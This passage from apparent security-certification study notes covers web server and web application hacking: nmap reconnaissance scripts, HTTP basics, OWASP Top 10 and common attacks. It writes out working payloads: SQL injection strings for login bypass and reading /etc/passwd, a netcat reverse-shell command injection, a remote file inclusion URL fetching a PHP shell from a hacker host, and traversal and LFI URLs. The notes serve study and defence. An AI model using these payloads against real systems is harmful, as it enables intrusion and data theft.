15 | - `nmap --script http-trace -p80 localhost`
16 | - Detects vulnerable TRACE method
17 | - `nmap --script http-google-email `
18 | - Lists email addresses
19 | - `nmap --script hostmap-* `
20 | - dDiscovers virtual hosts on the IP address you are trying to footprint; * is replaced by online db such as IP2Hosts
21 | - `nmap --script http-enum -p80 `
22 | - Enumerates common web apps
23 | - `nmap --script http-robots.txt -p 80 `
24 | - Grabs the robots.txt file
25 |
26 | - **Website Mirroring** - brings the site to your own machine to examine structure, etc.
27 | - **Tools**
28 | - Wget
29 | - BlackWidow
30 | - HTTrack
31 | - WebCopier Pro
32 | - Web Ripper
33 | - SurfOffline
34 |
35 | - **Vulnerability Scanning** - scans web server for vulnerabilities
36 | - **Tools**
37 | - Nessus
38 | - Nikto - specifically suited for web servers; still very noisy like Nessus
39 |
40 | - **Session Hijacking**
41 |
42 | - **Web Server Password Cracking**
43 |
44 | ## Web Server Architecture
45 |
46 | - **Most Popular Servers** - Apache, Microsoft IIS and Nginx
47 | - Apache runs configurations as a part of a module within special files (http.conf, etc.)
48 | - IIS runs all applications in the context of LOCAL_SYSTEM
49 | - IIS 5 had a ton of bugs - easy to get into
50 | - **N-Tier Architecture** - distributes processes across multiple servers; normally as three-tier: Presentation (web), logic (application) and data (database)
51 | - **Error Reporting** - should not be showing errors in production; easy to glean information
52 | - **HTML** - markup language used to display web pages
53 | - **HTTP Request Methods**
54 | - **GET** - retrieves whatever information is in the URL; sending data is done in URL
55 | - **HEAD** - identical to get except for no body return
56 | - **POST** - sends data via body - data not shown in URL or in history
57 | - **PUT** - requests data be stored at the URL
58 | - **DELETE** - requests origin server delete resource
59 | - **TRACE** - requests application layer loopback of message
60 | - **CONNECT** - reserved for use with proxy
61 | - Both POST and GET can be manipulated by a web proxy
62 | - **HTTP Error Messages**
63 | - **1xx: Informational** - request received, continuing
64 | - **2xx: Success** - action received, understood and accepted
65 | - **3xx: Redirection** - further action must be taken
66 | - **4xx: Client Error** - request contains bad syntax or cannot be fulfilled
67 | - **5xx: Server Error** - server failed to fulfill an apparently valid request
68 |
69 | ## Web Server Attacks
70 |
71 | - **DNS Amplification** - Uses recursive DNS to DoS a target; amplifies DNS answers to target until it can't do anything
72 |
73 | - **Directory Transversal** (../ or dot-dot-slash) - requests file that should not be accessible from web server
74 | - Example: http://www.example.com/../../../../etc/password
75 | - Can use Unicode to possibly evade IDS - %2e for dot and %sf for slash
76 |
77 | - **Parameter Tampering** (URL Tampering) - Manipulating parameters within URL to achieve escalation or other changes
78 |
79 | - **Hidden Field Tampering** - Modifying hidden form fields producing unintended results
80 |
81 | - **HTTP Response Splitting** - An attacker passes malicious data to a vulnerable application through the HTTP response header.
82 |
83 | - **Web Cache Poisoning** - Replacing the cache on a box with a malicious version of it
84 |
85 | - **WFETCH** - Microsoft tool that allows you to craft HTTP requests to see response data
86 |
87 | - **Misconfiguration Attack** - Same as before - improper configuration of a web server. (e.g: Default settings like admin/password credentials; Lack of security controls)
88 |
89 | - **Password Attack** - Attempting to crack passwords related to web resources
90 |
91 | - **Connection String Parameter Pollution** - Injection attack that uses semicolons to take advantage of databases that use this separation method
92 |
93 | - **Web Defacement** - Simply modifying a web page to say something else
94 |
95 | - **DoS/DDoS** - Compromise availability
96 |
97 | - **Shellshock** - Causes Bash to unintentionally execute commands when commands are concatenated on the end of function definitions
98 |
99 | - **Tools**
100 | - **Brutus** - brute force web passwords of HTTP
101 | - **Hydra** - network login cracker
102 | - **Metasploit**
103 | - Basic working is Libraries use Interfaces and Modules to send attacks to services
104 | - **Exploits** hold the actual exploit
105 | - **Payload** contains the arbitrary code if exploit is successful
106 | - **Auxiliary** used for one-off actions (like a scan)
107 | - **NOPS** used for buffer-overflow type operations
108 |
--------------------------------------------------------------------------------
/14-Hacking-Web-Applications.md:
--------------------------------------------------------------------------------
1 | # Hacking Web Applications
2 |
3 | ## Web Organizations
4 |
5 | - **Internet Engineering Task Force (IETF)** - Creates engineering documents to help make the Internet work better.
6 | - **World Wide Web Consortium (W3C)** - A standards-developing community.
7 | - **Open Web Application Security Project (OWASP)** - Organization focused on improving the security of software.
8 |
9 | ## OWASP Web Top 10
10 |
11 |
12 |
13 |
14 |
15 | *The [OWASP Top 10](https://owasp.org/www-project-top-ten/) is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.*
16 |
17 | - **A1 - Injection Flaws** - SQL, OS and LDAP injection
18 | - **A2 - Broken Authentication and Session Management** - functions related to authentication and session management that aren't implemented correctly
19 | - **A3 - Sensitive Data Exposure** - not properly protecting sensitive data (SSN, CC numbers, etc.)
20 | - **A4 - XML External Entities (XXE)** - exploiting XML processors by uploading hostile content in an XML document
21 | - **A5 - Broken Access Control** - having improper controls on areas that should be protected
22 | - **A6 - Security Misconfiguration** - across all parts of the server and application
23 | - **A7 - Cross-Site Scripting (XSS)** - taking untrusted data and sending it without input validation
24 | - **A8 - Insecure Deserialization** - improperly de-serializing data
25 | - **A9 - Using Components with Known Vulnerabilities** - libraries and frameworks that have known security holes
26 | - **A10 - Insufficient Logging and Monitoring** - not having enough logging to detect attacks
27 |
28 | **WebGoat** - project maintained by OWASP which is an insecure web application meant to be tested
29 |
30 |
31 | ## Web Application Attacks
32 |
33 | - Most often hacked before of inherent weaknesses built into the program
34 | - First step is to identify entry points (POST data, URL parameters, cookies, headers, etc.)
35 | - **Tools for Identifying Entry Points**
36 | - WebScarab
37 | - HTTPPrint
38 | - BurpSuite
39 | - **Web 2.0** - dynamic applications; have a larger attack surface due to simultaneous communication
40 |
41 | ---
42 | ## **SQL Injection**
43 |
44 | Injecting SQL commands into input fields to produce output
45 | - Data Handling - Definition (DDL), manipulation (DML) and control (DCL)
46 |
47 | SQL injection usually occurs when you ask a user for input, like their username/userid, and instead of a name/id, the user gives you an SQL statement that you will unknowingly run on your database.
48 |
49 | - **SQLi is used for**:
50 | - Bypass authentication
51 | - Extract information
52 | - Insert injection
53 |
54 |
55 | **SQL Syntax - Basics:**
56 |
57 | SQL Command | Info.
58 | -- | :--
59 | ``SELECT`` | extracts data from a database
60 | ``UPDATE`` | updates data in a database
61 | ``DELETE`` | deletes data from a database
62 | ``INSERT INTO`` | inserts new data into a database
63 | ``ALTER TABLE`` | modifies a table
64 | ``DROP TABLE`` | deletes a table
65 | ``CREATE INDEX`` | creates an index (search key)
66 | ``DROP INDEX`` | deletes an index
67 | ``UNION`` | is used to combine the result-set of two or more SELECT statements.
68 |
69 | ---
70 |
71 | ### SQL Injection in action:
72 |
73 | - On the UserId input field, you can enter:
74 | - `105 OR 1=1`.
75 |
76 | - The is valid and will not return only UserId 105, this injection will return ALL rows from the "Users" table, **since OR 1=1 is always TRUE**. Then, the SQL statement will look like this:
77 | - `SELECT * FROM Users WHERE UserId = 105 OR 1=1;`
78 |
79 | - Double dash ( `--` ) tells the server to ignore the rest of the query (in this example, the password check)
80 |
81 | > ⚠️ **Basic test to see if SQL injection is possible is just inserting a single quote ( `'` )**
82 | > - Can be on input field or URL
83 | > - This will make the web app return a SQL syntax error meaning that you are able to inject SQL queries.
84 |
85 |
86 | **Bypassing authentication:**
87 | - `admin' or 1=1 -- `
88 | - Basically tells the server **if 1 = 1 (always true)** to allow the login and the double dash `--` will comment the rest of the query in this case, the password.
89 | - variations: `1' or 1=1 #`
90 |
91 | - Based on `=` is always true;
92 | - `" or ""="` --> The SQL above is valid and will return all rows from the "Users" table, since OR ""="" is always TRUE.
93 | - This is valid and the SQL statement behind will look like this: ` SELECT * FROM Users WHERE Name ="John Doe" AND Pass ="myPass" `
94 |
95 | **Enumerating:**
96 | - `1' union all select 1,user() #`
97 | - The service are running as
98 |
99 | - `user' UNION ALL select 1,table_name,3,4,5 FROM information_schema.tables`
100 | - Dropping the tables
101 |
102 | **Load/Reading a file:**
103 | - `bob' union all select 1,load_file("/etc/passwd"),3,4,5 --`
104 | - Reading the /etc/passwd file
105 |
106 | **Writing a file:**
107 | - `bob' union all select 1,"Test",3,4,5 into outfile '/tmp/test.txt'--`
108 | - Writes the selected rows to a file. Column and line terminators can be specified to produce a specific output format.
109 |
110 | **Fuzzing** - inputting random data into a target to see what will happen
111 |
112 | **Tautology** - using always true statements to test SQL (e.g. `1=1`)
113 |
114 | **In-band SQL injection** - uses same communication channel to perform attack
115 |
116 | - Usually is when data pulled can fit into data exported (where data goes to a web table)
117 |
118 | - Best for using `UNION` queries
119 |
120 | **Out-of-band SQL injection** - uses different communication channels (e.g. export results to file on web server)
121 |
122 | **Blind/inferential** - error messages and screen returns don't occur; usually have to guess whether command work or use timing to know
123 |
124 | - **SQLi Tools:**
125 | - Sqlmap
126 | - sqlninja
127 | - Havij
128 | - SQLBrute
129 | - Pangolin
130 | - SQLExec
131 | - Absinthe
132 | - BobCat
133 |
134 | ---
135 |
136 | ### **Broken Authentication**
137 | Broken Authentication usually occurs due to the issues with the application’s authentication mechanism;
138 |
139 | - **Credential Stuffing and Brute Force Attacks**
140 | - **Weak Passwords & Recovery Process**
141 | - **Mismanagement of Session ID**
142 |
143 | *An attacker can gain control over user accounts in a system. In the worst case, it could help them gain complete control over the system.*
144 |
145 | ---
146 |
147 | ### **Command Injection**
148 | Execution of arbitrary commands on the host operating system via a vulnerable application.
149 | - Injection are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell.
150 | - Web apps sometimes need to execute OS commands to communicate with the underlying host OS and the file system. This can be done to run system commands, launch applications written in another programming language, or run shell, python, perl, or PHP scripts.
151 |
152 | **Example**:
153 | - Imagine a vulnerable application that has a common function that passes an **IP address from a user input** to the system's **ping command**.
154 | - User input: `127.0.0.1`
155 | - The following command is executed on the host OS:
156 | - `ping -c 5 127.0.0.1`
157 | - Is possible to break out the ping command to execute the attacker arbitrary commands:
158 | - `ping -c 5 127.0.0.1; id`
159 | - If the system is vulnerable the output will look like this (showing two OS commands, `ping` and `id`):
160 |
161 | ```console
162 | --- 127.0.0.1 ping statistics ---
163 | 5 packets transmitted, 5 received, 0% packet loss, time 3999ms
164 | rtt min/avg/max/mdev = 0.023/0.056/0.074/0.021 ms
165 |
166 | uid=0(root) gid=0(root) groups=0(root)
167 | ```
168 |
169 | - Without input sanitizing the attacker can do reverse shell:
170 | - `127.0.0.1; nc -nv 4444 -e /bin/bash`
171 |
172 | ---
173 |
174 | ### **Sensitive Data Exposure**
175 |
176 | When the web application doesn’t adequately protect sensitive information like **session tokens, passwords, banking information, location, health data**, or any other similar crucial data whose leak can be critical for the user.
177 |
178 | **Examples**:
179 | 1. *An application **stores credit card numbers in a database without encryption**. If an attacker gets access to the database through SQL injection, he could easily get the credit card numbers.*
180 |
181 | 2. **An application store passwords in the database using unsalted or simple hashes**. An attacker can expose the unsalted hashes using Rainbow Table attacks.
182 |
183 | 3. **A website that doesn’t enforce TLS or uses weak encryption.** An attacker could monitor network traffic and downgrade the connections from HTTPS to HTTP. Then, they can intercept the requests and steal the user’s session cookie
184 |
185 | ---
186 |
187 | ### **XEE - XML External Entities**
188 | Is a type of attack against an application that parses XML input. This attack occurs when **XML input containing a reference to an external entity is processed by a weakly configured XML parser.**
189 |
190 | - Attackers can supply XML files with specially crafted DOCTYPE definitions to an XML parser with a weak security configuration to perform **path traversal, port scanning, and numerous attacks, including denial of service, server-side request forgery (SSRF), or even remote code execution.**
191 |
192 | **Example**:
193 |
194 | - External entities can reference URIs to retrieve content from local files or network resources.
195 | - This payload will return the content of `/etc/passwd` file on target system's OS; (for windows you could reference `file:///c:/boot.ini` )
196 |
197 | ```xml
198 |
199 |
201 | ]>
202 | &xxe;
203 | ```
204 |
205 | ___
206 |
207 | ### **RFI - Remote File Inclusion**
208 |
209 | Is a method that allows an attacker to employ a script to include a remotely hosted file on the webserver. The vulnerability promoting RFI is largely found on websites running on PHP. This is because PHP supports the ability to `‘include’` or `‘require’` additional files within a script;
210 |
211 | **Vulnerable PHP Example**:
212 |
213 | > **`$incfile = $_REQUEST["file"]; include($incfile.".php");`**
214 |
215 | - The first line extracts the file parameter value from the HTTP request, while the second line uses that value to dynamically set the file name, without any appropriate sanitization of the file parameter value, this code can be exploited for unauthorized file uploads.
216 |
217 | - For example the URL below contains an external reference to a reverse shell made in PHP file, stored in a remote location:
218 | - `http://www.example.com/vuln_page.php?file=http://www.hacker.com/netcat.php_`
219 |
220 | ---
221 |
222 |
223 | ### **LFI - Local File Inclusion**:
224 | is very much similar to RFI. The only difference being that in LFI, in order to carry out the attack instead of including remote files, the attacker has to use local files (e.g: files on the current server can only be used to execute a malicious script).
225 |
226 | **Examples**:
227 | - `http://example.com/?file=../../uploads/evil.php`
228 |
229 | ---
230 |
231 | ### **Directory Traversal**
232 | An attacker can get sensitive information like the contents of the /etc/passwd file that contains a list of users on the server; Log files, source code, access.log and so on
233 |
234 | **Examples:**
235 | - `http://example.com/events.php?file=../../../../etc/passwd`
236 | - An attacker can get the contents of the **/etc/passwd** (file that contains a list of users on the server).
237 |
238 | *Similarly, an attacker may leverage the Directory Traversal vulnerability to access **log files** (for example, **Apache access.log or error.log**), **source code**, and other sensitive information. This information may then be used to advance an attack.*
239 |
240 | ---
241 | ### **XSS (Cross-site scripting)**
242 | Inputting JavaScript into a web form input field that alters what the page does.
243 | - Can also be passed via URL
244 | - Can be malicious by accessing cookies and sending them to a remote host
245 | - Can be mitigated by setting **HttpOnly** flag for cookies; But many hackers can circumvent this in order to execute XSS payloads.
246 |
247 | ### Types of XSS:
248 |
249 | 1. **Stored XSS** (Persistent or Type-I) - stores the XSS in a forum or like for multiple people to access.
250 |
251 | 2. **Reflected XSS** (or also called a non-persistent XSS); when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.
252 |
253 | 3. **DOM Based XSS** (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim's browser used by the original client side script, so that the client side code runs in an “unexpected” manner.
254 |
255 | Examples of XSS payloads:
256 | - `">`
257 | - `